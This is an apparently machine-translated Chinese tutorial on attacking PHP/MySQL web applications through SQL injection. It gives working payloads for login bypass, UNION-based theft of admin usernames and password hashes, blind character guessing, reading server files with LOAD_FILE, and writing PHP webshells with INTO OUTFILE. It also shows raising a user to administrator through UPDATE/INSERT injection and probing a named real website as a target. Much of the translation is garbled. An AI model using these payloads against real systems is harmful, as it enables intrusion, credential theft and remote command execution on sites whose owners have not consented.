PHP injection topic

.........

Select * from users where username Like '% $ search%' Order by Username

.......

?>

Here us in contact with the wildcard in MySQL, '%' is a wildcard, and other wildcards have '*' and '_', where "*" is used to match the field name, and "%" is used to match the field value, pay attention What% must be applied with Like, there is a wildcard, which is the underscore "_", which is different from the meaning and the above, is used to match any single character. In the above code, we use '*' to indicate all field names returned, and% $ search% indicate all content that contains $ Search characters.

How do we inject?

Haha, it is very similar to the ASP.

Submit in the form

AABB% 'OR 1 = 1 Order by ID # Note: # # m m 中 注 注 即 即 即 l l l l l l l l l l l l l l l 不 l 不 不 不 不 不 不

Perhaps someone will ask why I want 1 = 1, look at it,

Bring the submitted content into the SQL statement

Select * from users where username like '% aabb%' or 1 = 1 Order by ID # Order by Username

If there is no user name containing AABB, or 1 = 1 makes the return value true, enabling all values

We can still do this

Submit in the form

% 'Order By ID #

or

'Order by ID #

Brought into the SQL statement

Select * from users where username like '%%' Order by ID # Order by username

with

Select * from users where username like '%%' Order by ID # Order by Username

Of course, the content is returned.

List all users, no password is coming out.

Here is an example, there will be a more exquisite SELECT statement, and select is almost everywhere!

2) Look at UPDATE

This explanation in mysql Chinese manual:

Update [low_priority] TBL_NAME SET col_name1 = expr1, col_name2 = expr2, ...

[Where where_definition]

Update updates the column of the existing table in the new value, and the set clause indicates which column to modify and they should be given, where clauses, if give, specify which line should be updated, otherwise all rows are updated.

Details go to the mysql Chinese manual 7.17, the words that will be detailed here will be very proud.

It is understood that Update is mainly used for data updates, such as the modification of the article, and the modification of user information, we seem to be more concerned, because ...

See the code first

Let's give the structure of the table first, so everyone understands

Create Table Users

ID INT (10) Not Null Auto_Increment,

Login Varchar (25),

Password varchar (25),

Email varchar (30),

UserLevel Tinyint,

Primary Key (ID)

)

Among them, the userlevel represents the level, 1 is administrator, 2 is ordinary users

//rChange.php

......

$ SQL = "Update users set password = '$ pass', email = '$ email' where id = '$ ID'"

......

?>

OK, we started to inject it, add Email where we add

Netsh @ 163.com ', Userlevel =' 1

The SQL statement is executed

Update users set password = 'YOUPASS',

Email = 'netsh @ 163.com', userlevel = '1' where id = 'YOUID'

Look at our Userlevel is 1, become an administrator.

Haha, so cool, it is a must-have for home travel.

Here we simply mention the problem of single quotation, if only one single quotes are used without single quotes, the system will return an error. Column Types are divided into digital types, date and time types, string types, however quotes are generally used in string types, and in digital types, ordinary people will not use quotation marks (however it can be used, and power is very powerful Large), date and time types are rarely used for injection (because few submitted time variables). In the following we will detail these types of injection methods! 3) The next round to INSERT, it has been waiting for impatient, just like the students in the noon cafeteria.

PHP Chinese manual teaches us:

INSERT [low_priority | delayed] [ignore]

[INTO] TBL_NAME [(col_name, ...)]]

VALUES (Expression, ...), (...), ...

INSERT Inserts a new line into an existing table, insert ... Values ​​form, based on the explicit specified value inserted, insert ... select the line selected from other tables, there are multiple values ​​of INSERT. .. VALUES is supported in MySQL 3.22.5 or later, col_name = expression syntax is supported in MySQL 3.22.10 or later.

It can be seen that in order to see the background, INSERT mainly appears in a registered place, or there are other places where you submit it.

Look at the structure of the table

Create Table MEMBRES

ID VARCHAR (15) Not null default '',

Login Varchar (25),

Password varchar (25),

Email varchar (30),

UserLevel Tinyint,

Primary Key (ID)

)

We still assume that userLevel represents the user level, 1 for the manager, 2 is ordinary users.

code show as below

//reg.php

......

$ query = "INSERT INTO MEMBERS VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')

......

?>

Default Insert User Level is 2

Now we build the injecting statement.

Still entering the Email where you want to enter:

Netsh@163.com ',' 1 ') #

The SQL statement is turned to:

INSERT INTO MEMBRES VALUES ('Youid', 'YOUNAME', 'YOUPASS', 'Netsh@163.com', '1') # ',?')

It is an administrator to see if we register.

# 号 What said, not forgot, dizzy, so fast?

Forget, forget it, let you talk about it in detail.

2. Let's talk about the comments in MySQL, this is very important, you can't sleep anymore, if you sleep, you will hang you when you go to the end of the exam.

We continue

I believe that everyone has seen the powerful role of the comment in several examples, here we will introduce it in detail.

Mysql has three comment sentences

# 注 掉 本 本 本 内容

- Injection effect same #

/ * ... * / Note part of the symbol

For ## will be our most commonly used annotation method.

- Remember that there is a space behind you to get an annotation.

/ * ... * / We generally use the previous / * is enough, because we can't do it later, right? Note: When the browser address bar is input #, you should write it into% 23, so that after the Urlencode conversion can be converted #, it is a role in the comment. # 号 Your words in the browser address box are not ok.

For everyone to understand

Here I will give you an example.

Some administrator information table

Create Table Alphaauthor (

ID tinyint (4) Not null auto_increment,

Username varchar (50) Not null default ',

Password varchar (50) Default Null,

Name varchar (50) Default Null,

Primary Key (ID),

UNIQUE Key ID (ID),

Key ID_2 (ID)

)

//Login.php

......

$ query = "SELECT * from alphaauthor where username = '$ usrname' and password = '$ passwd'";

$ result = mysql_query ($ query);

$ DATA = mysql_fetch_Array ($ Result);

IF ($ DATA)

{

ECHO "important information";

}

Else

Echo "landing failed";

......

?>

We enter directly in the browser address box

http://***/login.php? username = a'or id = 1% 23

% 23 Convert into #

Put it in the SQL statement

Select * from alphaauthor where username = 'a'or id = 1 #' and password = '$ passwd'

# 号, I have entered it, see

This sentence is equivalent to

Select * from alphaauthor where username = 'a'or id = 1

Take a closer look at the structure of the table, as long as there is ID = 1 account, the returned $ data should be true.

We will log in directly, of course you can write

HPPT: //***/login.php? UserName = a'or 1 = 1% 23

Like

3. The following is to appear ...

Yes, the spies of these display system information

Version () Returns the database version information

Database () Returns the current database name if there is no current database, Database () returns an empty string.

User ()

SYSTEM_USER ()

Session_user ()

Return the current mysql username

Mysql> Select user (), database (), version ();

---------------- ----------------

User () | Database () | Version () |

---------------- ----------------

Root @ localhost | alpha | 5.0.0-alpha-nt |

---------------- ----------------

1 row in set (0.01 sec)

As shown in Figure (1), isn't it very cool? Well, your big eyes are good.

Sometimes it is useful, for example, you can see if his MySQL version is overwhelming, if we find a good moving east, the most important part is, no sleep. From the spirit, I wake up and wake up.

1) SELECT UNION SELECT

Or PHP Chinese manual:

Select ... union [all] select ... [union select ...]

Union is implemented in MySQL 4.0.0.

UNION is used to combine the results of multiple SELECT statements to a result set.

The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.

The select command is a normal selection command, but there are the following restrictions:

Only the last select command can have Into Outfile.

It should be noted that the number of SELECT fields before and after UNION is the same, and only the UNION function can play a role. If the number of fields will be returned

Error 1222 (21000): The Used SELECT STATEments HAVE A DIFFERENT NUMBER OF Column Error

Dizziness, this is not good. Is it half?

Don't happe, no use

E.g:

It is known that the alphadb table has 11 columns

we

Mysql> Select * from alphadb where id = 351 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 from alphaauthor

Figure (2)

We only Slect has 10 numbers of course.

Below

Mysql> Select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor

Figure (3)

Let's take a look at the data in ID = 247

MySQL> SELECT * from alphadb where id = 347;

--- ------------------------------------------- - -----------------

| ID | TITLE | Content | ImportTime | Author | Accessing | AddInto | Type | Showup | Change_UBB | Change_HTML |

--- ------------------------------------------- - -----------------

| 347 | Take advantage of adsutil.vbs ..- published in the Man Association 2004.6 | Posted in Hacker X Archive Phase 6 | 2004

-03-28 11:50:50 | Alpha | 17 | ALPHA | 2 | 1 | 1 | 1 |

--- ------------------------------------------- - -----------------

1 row in set (0.00 sec)

We see that it returns the result and

Mysql> Select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor

Are the same.

Oh, everyone may ask, what is the use?

Asked good.

OK, continue trial

When we enter a non-existing id, for example, id = 0, or ID = 347 and 1 <> 1

Look at it again

Mysql> Select * from alphadb where id = 347 and 1 <> 1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor

Figure (4)

We found that it gave all the items 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 to each field.

Haha, finally showed a different, but what is this?

Don't tell you first.

We tell a specific example first

http://localhost/site/display.php? id = 347

Look at Figure 5

Http://localhost/site/display.php? id = 347 and 1 <> 1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11 from alphaauthor

The result is as shown in Figure 6

Below we use a picture to summarize the usage of Union as shown in Figure 7

OK, know how to use it? If you don't know, you will tell you in detail.

2) Load_file

This feature is too powerful, which is also the method mentioned in the last topic. Although I said, I have to mention it.

Load_file can return the content of the file, remember to write a full file path and file name

ETC.

We entered in MySQL command line

MySQL> SELECT LOAD_FILE ('c: /boot.ini');

Effect is shown in Figure (8)

But how do we do it in the web?

We can use Union Select usage

http://localhost/site/display.php? id = 347% 20and% 201 <> 1% 20Union% 20Select% 201, 2, LOAD_FILE ('c: /apache/htdocs/site/lib/sql.inc') 4, 5, 6, 7, 8, 9, 10, 11

Here C: /Apache/htdocs/site/lib/sql.inc is not my profile,: P

Look carefully in Figure 9

Look, the document content is undoubted.

Why do we put load_file ('c: /apache/htdocs/site/lib/sql.inc') 3 fields? We mention that there are three types of column types, and the place where 3 in Figure 7 is displayed should be displayed in the article, and should be character type, and load_file ('c: / apache / htdocs / site / lib / sql. INC ') is also a character type, so we speculate that it can be displayed smoothly in 3 fields.

In fact, there are still a lot of good use methods, continue to look down!

3) Select * from table instfile'file.txt '

Is there any?

The role is to write the content of the table to the file, know more important, we write a WebShell, haha.

Of course, we are not just exporting tables, we can also export other things, look down.

Suppose there is a table below

#

# 数据 数据 结构 结构 `Test`

#

Create Table Test

A Text,

B Text

ENGINE = myisam default charSet = latin1;

#

# Export the following database content` Test`

#

INSERT INTO TEST VALUES ('', Null); known my website path in c: / apache / htdocs / site /

Ok, see you show, type

Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, A, 4, 5, 6, 7, 8, 9, 10, 11% 20FROM% 20Test% 20InTo% 20Outfile% 20'c: /apore/htdocs/site/cmd.php '

It means to export contents in the table to cmd.phphuang

Take a look at the content in cmd.php

1 2 0000-00-00 00:00:00 5 6 7 8 9 10 11

Let's take a look

http://localhost/site/cmd.php? cmd = DIR

Figure (10)

Haha, it's really cool!

4) Let's tell you about the story of Load Data Infile

Load Data [Low_Priority] [local] infile 'file_name.txt' [Replace | ignore] INTO TABLE TBL_NAME

The Load Data INFILE statement reads a table in a text file in a very high speed.

Because this statement is generally entered directly in the browser, it is not very big.

Here is an example to say

Table Test structure and the same introduction above

#

# 数据 数据 结构 结构 `Test`

#

Create Table Test

A Text,

B Text

ENGINE = myisam default charSet = latin1;

We entered in the mysql command line:

MySQL> Load Data Infile 'C: /Cmd.php' Into Table Test

Where c: / cmd.php content is

Note: The above content is written in a row.

We use the above instructions to enter the content of cmd.asp into the TEST table.

The result of the result is shown in Figure (11)

In fact, it is the content in the last example TEST table! Take a look, combined with Into Outfile, is it a perfect combination?

The basic syntax will come here, there may be a lot of important things miss, you can go to the PHP Chinese manual, I believe you will find a lot of good things, tap it. (With Disc, we pay a php Chinese manual)

B: From the injection method

Mainly digital, character types and search classes

Digital

Very common, we have always been a character type, you should still remember how to break the administrator password under the ASP, let's take a look at how to implement the PHP.

We entered in the address bar:

http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FROM% 20alphaauthor)

Determine whether there is alphaauthor, if there is a normal page (general situation, sometimes it returns something, this is mainly based on the page of the configuration 1 = 1 and 1 = 2)

http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FROM% 20LPhaauThor% 20where% 20Length (username) = 5) Judging whether the length of the Username field is 5

http://localhost/site/display.php? id = 451% 20and% 201 = (select% 20min (ID)% 20FROM% 20LPhaauThor% 20where% 20Length (username) = 5% 20ance% 20Length (password) = 32)

It's almost the same, judge the length of the Password field.

The following is the stage of guess code, and a speculation is used to use the ASCII method. Ascii is equivalent to ASC, haha, often watching hacker X files must be clear.

http://localhost/site/display.php? id = 451% 20and% 201 = (select% 20min (ID)% 20FROM% 20alphaauthor% 20where% 20ASCII (MID (UserName, 1, 1)) = 97)

The first place in the username, ascii97 is character a.

http://localhost/site/display.php? id = 451% 20And% 201 = (select% 20min (ID)% 20FROM% 20alphaauthor% 20where% 20ASCII (MID (username, 2, 1)) = 108)

The second place, here only put this picture, as shown (12)

The X bar is omitted below.

Anyway, we finally got the username and password.

We will find that the injection method here is almost the same as the injection under the ASP. It is to turn the ASC into Ascii, turn the Len to Length, and finally we can get the background administrator account and password.

Of course, we have a simpler way, you can directly get directly with Union methods.

Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, UserName, Password, 4, 5, 6, 7, 8, 9, 10, 11% 20FROM% 20alphaauthor

Figure (13)

The account is Alpha, the password is a long string of stuff, haha, simple and clear, see no, here there is no power, the powerful power of Union Select.

What is told above is to guess content in a unconfigured table. If we can be like this in the same table:

One of the following sections displays user information according to user ID

//User.php

........

$ SQL = "SELECT * from user where id = $ ID";

..........

IF (! $ results)

{

Echo "WRONG";

EXIT;

}

Else

Echo "User Information";

?>

The speculation method is almost the same, that is, we don't have to use SELECT.

We entered

http://localhost/user.php? id = 1 and length (password) = 7

Show user information Description We guess the correct, huh, huh, comeon

http://localhost/user.php? id = 1 And ascii (MID (Password, 1, 1)) = 97

First password

http://localhost/user.php? id = 1 And ascii (MID (Password, 2, 1)) = 97 second place,

Through this method, we can also get the account password for id = 1 users.

2. Let's take a look at the way of injection of characters.

The implantation method of the character model in the ASP is flexible, and the injection of character model in PHP is mainly

Magic_quotes_GPC = OFF is carried out. (Unless there is another situation, don't tell you first)

E.g:

//display.php

......

$ query = "select * from alphadb where id = '". $ ID. "'";

............ .....

?>

Such ID will become a characteristic.

I don't know if you have found it. If we write the program like this, security will improve.

Oh, continue

Good, we test whether there is an injection first

Http://localhost/site/display.php? id = 451 'and 1 = 1 and' '='

http://localhost/site/display.php? id = 451 'and 1 = 2 and' '='

Brought into the SQL statement is

SELECT * from alphadb where id = '451'and 1 = 1 and' '=' '

SELECT * from alphadb where id = '451'and 1 = 2 and' '=' '

If you find that the page information is different, the vulnerability exists.

or

http://localhost/site/display.php? id = 451 'and 1 = 1% 23

http://localhost/site/display.php?id = 451 'and 1 = 2% 23

% 23 is the conversion of #, ie the meaning of the comment, saying it above.

In this way, you don't have to consider the closure problem of the quotation marks. I actually recommend this method.

Bring it into the SQL statement.

Select * from alphadb where id = '451'and 1 = 1 #'

It is what we want!

Look at the effect,

http://localhost/site/display.php? id = 451 'and 1 = 1% 23

Figure (14)

Normal display!

http://localhost/site/display.php?id = 451 'and 1 = 2% 23

Figure (15)

Show abnormal, haha, explain the problem

We continue:

Http://localhost/site/display.php? id = 451 '% 20and% 201 = 2% 20% 20Union% 20Select% 201, UserName, Password, 4, 5, 6, 7, 8, 9, 10 ,11 % 20FROM% 20alphaauthor% 23

Look at the picture (16)

OK, username and password come out again!

3. Let's take a look at the search type.

Search type of statement is generally written

//search.php

......

$ query = "SELECT * from alphadb where title Like '% $ title%'

............ .....

?>

I don't know if you still remember the injection in the ASP?

But I don't remember that there is no relationship, let's see it. We build the injecting statement

Enter the input box

A% 'and 1 = 2 Union Select 1, username, 3, 4, 5, 6, 7, 8, password, 10, 11 from alphaauthor # put it in the SQL statement into

Select * from alphadb where title Like '% a%' and 1 = 2 Union SELECT 1, UserName, 3, 4, 5, 6, 7, 8, password, 10 ,11 from alphaauthor #%

The result is shown in Figure 17.

How, come out, haha, everything is in progress.

C: Let's take a look at various injection attacks from the injecting place.

1) Let's take a look at the backstage.

First

//login.php

.......

$ query = "select * from alphaauthor where username = '"

. $ Http_post_vars ["Username"]. "'And

Password = '"" $ http_post_vars ["password"]. "'";

$ result = mysql_query ($ query);

$ DATA = mysql_fetch_Array ($ Result);

IF ($ DATA)

{

Echo "Successful Landing";

}

ESLE

{

Echo "re-landing";

EXIT;

}

.........

?>

UserName and Password have not been putted directly in SQL through any handle.

See how we get worse?

The most classic or that:

Enter in the username and password box

'Or' '='

Brought into the SQL statement

Select * from alphaauthor where username = '' or '=' 'and password =' ​​'or' '=' '

In this way, $ DATA is definitely true, that is, we have successfully logged in.

There are other bypassing methods, the principle is the same, that is, try to let $ data return to be true.

We can use the following Chinese law.

1.

Username and password are entered to 'or'a' = 'a

SQL became

Select * from alphaauthor where username = '' OR'A '=' a 'and password =' ​​'or'a' = 'a'

2.

Username and password are input to 'or 1 = 1 and' '='

SQL became

Select * from alphaauthor where username = 'or 1 = 1 and' '=' 'and password =' ​​'or 1 = 1 and' '=' '

Username and password are input to 'or 2> 1 and' '='

SQL became

Select * from alphaauthor Where username = '' or 2> 1 and '' = '' and password = '' or 2> 1 and '' = ''

3.

User Name Enter 'or 1 = 1 # Password Casual Enter

SQL became

Select * from alphaauthor where username = '' or 1 = 1 # and password = 'anything'

The back is commented out, of course, returns or really.

4.

Suppose admin Id = 1, you can also enter 'or ID = 1 # password casually.

SQL became

Select * from alphaauthor where username = '' or id = 1 # and password = 'Anything'

Figure 18

Look at the renderings 19

how about it? Log in directly!

As the saying goes, I don't think I can't do it.

There are more constructors waiting for the class to think about it.

2) The second commonly injected place should be regarded as a front desk.

I have already mentioned many times, and it involves digital type, character type, etc., this is no longer repeated here.

Just give an example review

Bihai Chao Download Station - V2.0.3 Lite has injected vulnerabilities, the code is no longer listed.

Direct view

Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20DL_USERS

Figure 20

Look, we get what we want.

User name alpha

Password a long string.

Why we have to put password in 3 fields, put username at 5 fields, we have already mentioned it, that is, we speculate that 3 and 5 paragraphs should be a string type, and we want to display UserName The field type of Password should be the same, so we put it like this.

Why use 18 fields? I don't know if you still remember that we mention that UNION SELECT must require the same number of select before and after, we can speculate in the number of SELECTs to guess the need for 18 fields, only the content of the Union Select will be displayed normally. Oh!

3) Others such as data modification, where users are registered to have a user level application.

We have already told the update and insert above, because it is not very common, this is no longer elaborated, and some advanced utilization skills on Update and Insert will be mentioned below.

2: The injection attack teaching link will be entered below Magic_QUOTES_GPC = ON.

When Magic_QUOTES_GPC = ON, all the '(single quotes) in the handed variables,

"(Double Quotes), / (reverse slope) and empty characters will automatically turn into an escape character with a backslapped line.

This makes a method of injection into bubbles. At this time, we can only inject digital type and not

INTVAL () has been handled, and the digital type has been speaking a lot, because the digital type is not used to single quotes naturally have no problem, we can inject it directly for this situation.

1) If it is a character type, it must be like this, and there is no quotation number on characters.

Here we have to use some string processing functions,

There are a lot of string handle functions, which we mainly speak the following, and you can refer to the mysql Chinese reference manual 7.4.10.

Char () interprets the parameters as an integer and returns a string consisting of these integers. ASCII code characters.

Of course, you can use the 16 credits of characters instead of characters, which is ok, the method is to add 0x in front of the 16-encyclopedia, see the example below.

//login.php

......

$ query = "select * from". $ art_system_db_table ['user']. "

Where username = $ usrname and password = '". $ PW."' "; ......

?>

Suppose we know that the user name of the background is alpha

After converting into ASCII, it is Char (97, 108, 112, 104, 97)

Transforming into 16-based 0x616c706861

(We will provide 16 credits and ASCII conversion tools in the CD)

Ok, enter directly in your browser:

http://localhost/site/admin/login.php? username = char (97, 108, 112, 104, 97)% 23

SQL statement becomes:

Select * from alphaauthor where username = char (97, 108, 112, 104, 97) # and password = ''

Figure 21

As we expect, he successfully implemented, we got what we wanted.

Of course, we can also construct this

http://localhost/site/admin/login.php? username = 0x616c706861% 23

SQL statement becomes:

Select * from alphaauthor where username = 0x616c706861% 23 # and password = ''

We once again be a success. Very sense of accomplishment,

Maybe you will ask us if you can put # it in char ()

In fact, Char (97, 108, 112, 104, 97) is equivalent to 'alpha'

Note that Alpha adds quotation marks to represent the alpha string.

We know if executed in mysql

MySQL> Select * from dl_users where username = alpha;

Error 1054 (42S22): Unknown Column 'Alpha' in 'Where Clause'

Look at the return error. Because he will think that Alpha is a variable. So we have to add quotation marks on Alpha.

as follows

Mysql> Select * from dl_users where username = 'alpha';

This is correct.

If you go to the ##, you will become 'alpha #'

Bring the SQL statement

Select * from dl_users where username = 'alpha #';

Of course, it is ok, because even alpha # this user is not.

Ok, let's take an example below.

//display.php

......

$ query = "select * from". $ art_system_db_table ['article']. "

Where type = $ TYPE;

......

?>

The code displays the content according to the type, and $ TYPE does not filter and there is no additional number in the program.

Suppose Type contains xiaohua class, Xiaohua's char () conversion is

CHAR (120, 105, 97, 111, 104, 117, 97)

We build

Http://localhost/display.php? type = char (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union Select 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10, 11 from alphaauthor

Bring the SQL statement:

Select * from ". $ art_system_db_table ['Article']." WHERE TYPE = CHAR (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union Select 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10 11 from alphaauthor

Look, our username and password are like it! No screenshot, imagine it: P

2) Maybe someone will ask, can you still use the powerful load_file () in the case of magic_quotes_gpc = ON?

This is exactly what we have to be willing. The use format of load_file () is LOAD_FILE ('file path')

We have found that just convert the 'file path' to char (). Try it

Load_file ('c: /boot.ini') is transformed into

Load_file (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105))

Figure 22

Put it in the specific injection

Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Load_File (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)), 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

See Figure 23

Look, we saw the content of boot.ini.

Unfortunately, INTO OUTFILE '' can't be bypassed, otherwise it is more cool. But there is still a place to use Select * from Table Into outfile '' That is .... (Selling a Cat, will tell you below)

Three: Some injection skills, many are all personal discovery.

1.Union select skills

UNION is used to combine the results of multiple SELECT statements to a result set. The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.

However, we can speculate in the type of column with the following method, but save a lot of time

Let's first

Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18

Figure 24

Look at the software description 3, the author is written 4, we can guess the position of 3 and 4 is the character, we look at the number of downloads in front, this should be int type, right .

Ok, we build it according to here, it is estimated that UserName and Password are also characterized.

Try it

Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20DL_USERS

Figure 25

Haha, this method can probably guessed as long as you see.

2.Load_file read and write the skills

I don't know if you have found that we can't display in the web when we use Load_File () to read and write PHP files. E.g:

'C: /apache/htdocs/site/lib/sql.inc.php' Transformation to 16 Enterprises: 0x433A2F6170616368652F6874646F63732F736974652F69622F73716C2E696E632E706870 We construct as follows

http: //localhost/site/display.php id = 451% 20and% 201 = 2% 20% 20union% 20select% 201,2, load_file (0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870), 4,5,6,7,8,9,10? 11

Figure 26

It is found that the place in the article is originally displayed, but it is empty, why?

Let's take a look at the source code of the web page

Figure 27

Haha, look at the marked place, dizzy, it is here, but why?

Original HTML <> for labeling, haha, understand! You can remember where to find it next time.

4. MD5 nightmare

Dr. Wang, the University of Shandong University, has recently engaged in MD5, and we will come to work, we are more cool than him, don't calculate, haha.

MD5 we have a way to bypass, but not where you can, the MD5 function in PHP can not be bypassed, because all things you entered are in it, it is not running. The MD5 in the SQL statement can be bypassed. Of course, the functions in SQL can be bypass, the truth is the same.

See example first:

//login.php

......

$ query = "SELECT * from alphaauthor where username = md5 ($ usrname) and password = '". $ PW. "'";

......

?>

We are submitted directly in the browser

HTTP: /LOGIN.PHP? Username = char (97,98)) OR 1 = 1% 23

Brought into the SQL statement to become a select * from alphaauthor where username = md5 (Char (97,98)) or 1 = 1 #) and password = '"". $ PW. "

Remember that the MD5 is like a character, because there is OR 1 = 2 behind, so we just put a char (97, 98). OK, the landing is successful! Look, MD5 is not used in front of us.

5. Core technology, using PHP MySQL injection vulnerability directly to WebShell. .

Direct use of injection to get WebShell, this should be everyone thinking, let you teach you below.

Here to assume that you already know the physical path where the site is located, I assume that the website path is c: / apache / htdocs / site. The mysql connection information of the website is placed in /lib/sql.inc.php

1) Applicable to Magic_QUOTES_GPC = OFF

Suppose we can upload pictures, or txt, zip, and so on, we change our Trojan to

JPG suffix, uploaded path to /upload/2004091201.jpg

2004091201.jpg is

Ok, we start

http://localhost/site/display.php? id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD_FILE ('c: /apache/htdocs/site/upload/2004091201.jpg' ), 4, 5, 6, 7, 8, 9, 10 ,11% 20INTO% 20Outfile'c: /apache/htdocs/site/shell.php 'Because of Outfile, the web page is displayed abnormal, but our task It was completed.

Figure 28

Let's go see it.

http://localhost/site/shell.php? cmd = DIR

Figure 29

Suffen? WebShell we have created success. Did you see the front 12? That is, we are output from SELECT 1, 2!

2) The method of saving WebShell when it is suitable for Magic_quotes_GPC = ON, obviously, can be used when Magic_QUOTES_GPC = OFF is time.

We read his profile directly, the method introduced by skill 2

http: //localhost/site/display.php id = 451% 20and% 201 = 2% 20% 20union% 20select% 201,2, load_file (0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870), 4,5,6,7,8,9,10? 11

Get the content of SQL.inc.php

Ok, we know the mysql root password, we found the background of phpmyadmin

http: // localhost / phpmyadmin /

Use the root password to log in.

Figure 30

Then we newly established a table structure is as follows:

#

# 数据 数据 结构 结构 `TE`

#

Create Table Te (

CMD text Not Null

ENGINE = myisam default charSet = latin1;

#

# Export the following database content` TE`

#

INSERT INTO TE VALUES ('');

OK, it's time we used Select * from Table Into Outfile ''.

Directly in PHPMYADMIN SQL input

Select * from `TE` INTO OUTFILE 'C: /APACHE/HTDOCS/SITE/CMD1.PHP'

Figure 31

OK, successfully executed, let's go

http://localhost/site/cmd1.php? cmd = DIR Look at the effect

Figure 32

A good WebShell is! Haha, I also like it too.

But I don't know if you find that we have completed this work in the case of Magic_QUOTES_GPC = ON. Note PHPMYADMIN is too great, this is what we are talking about Magic_QUOTES_GPC = ON by bypassing! 6. Discover that we can also use Update and INSERT to insert our data, then get our Webshell, and use the above example,

//reg.php

......

$ query = "INSERT INTO MEMBERS

VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')

......

?>

We entered the Email place

Suppose the ID we registered is 10

Then we can find a place that can be injected.

Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, Email, 4, 5, 6, 7, 8, 9, 10 ,11% 20FROM% 20User% 20where% 20ID = 10% 20 INTO% 20Outfile'c: /apore/htdocs/site/test.php '

Ok, we have our wenshell.

7.Mysql's cross-library query

Everyone has always heard that mysql can't query, haha, today I will teach everyone a good way, through this method to achieve the changed cross-library query, the method is to directly read the Data folder in MySQL through Load_file. The file content is achieved, thereby implementing an abnormal cross-library query.

Give an example.

Before this, let's talk about the structure under the mysql Data folder.

There is a folder generated by the database name, and the folder is generated in the folder to generate three complications for FRM, MYD, MYI, such as

There is an alpha database in MySQL, there are two tables in Alphaauthor and Alphadb in the Alpha library.

The alpha folder content is as follows 33

Among them, alphadb.frm places data in the LPhadb table, alphadb.frm places the structure, and the content of alphadb.myi is different with mysql version, and the specific can be used to open with Notepad.

Experiment start

Suppose we know that there is another database Yminfo210 exists, and there is a table user, the user is putting this admin information.

we

http://localhost/site/display.php? id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD_FILE ('Yminfo210 / user.myd'), 4, 5, 6, 7 8, 9, 10, 11

Explanation, the directory where the LOAD_FILE default is the Data directory under MySQL, so we use

Load_file ('yminfo210 / user.myd'), of course, Load_file ('. Info210 / user.myd') is the same, note that the default path of INTO OUTFILE is in the database folder.

The result is shown in Figure 34

We read the content

舼 ? Admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comAdmin Question Admin Answer

Http://www.yoursite.com (? 靃?  靃? 靃? 127.0.0.1 D |? ? AAA 3DBE00A167653A1AAEE01D93E77E730E SDF@sd.com sdfasdfsdfa asdfadfaSD? E 麷 AM 麷 A 127.0.0.1 222 22222223423

Although there is a bunch of garbled, we can still see that the user name is admin, the password is 698D51A19D8A121CE581499D7B701668, which is another information.

In this way, we have achieved the curve cross-library, and the examples below will also be mentioned!

Said so much below us to use it, this test is a famous security site - black and white network

Listening to people saying that black and white vulnerabilities? Let's take a look.

http://www.heibai.net/down/show.php?id=5403 and 1=1

normal display.

Figure 35

http://www.heibai.net/down/show.php?id=5403 and 1=2

The display is not normal.

Figure 36

Ok, we continue

http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1

The result is as follows

Figure 37

Note that there is no display name in the picture, and it is also included.

Warning: mysql_fetch_Object (): Supplied Argument is not a valid mysql result resource in d: /web/heibai/down/show.php on line 45

Warning: mysql_fetch_Array (): Supplied Argument is not a valid mysql result resource in d: /web/heibai/down/global.php on line 578

Dizziness, the website is coming out, then you will die!

We continue until we guessed

http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19

Normally it is normal.

Figure 38

Good, our conversion statement has become

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19

Show as shown in Figure 39

Look at the introduction is 12, we can guess that you should be a characteristic!

OK, let's take a look at the file content first

D: /web/heibai/down/show.php is converted to ASCII

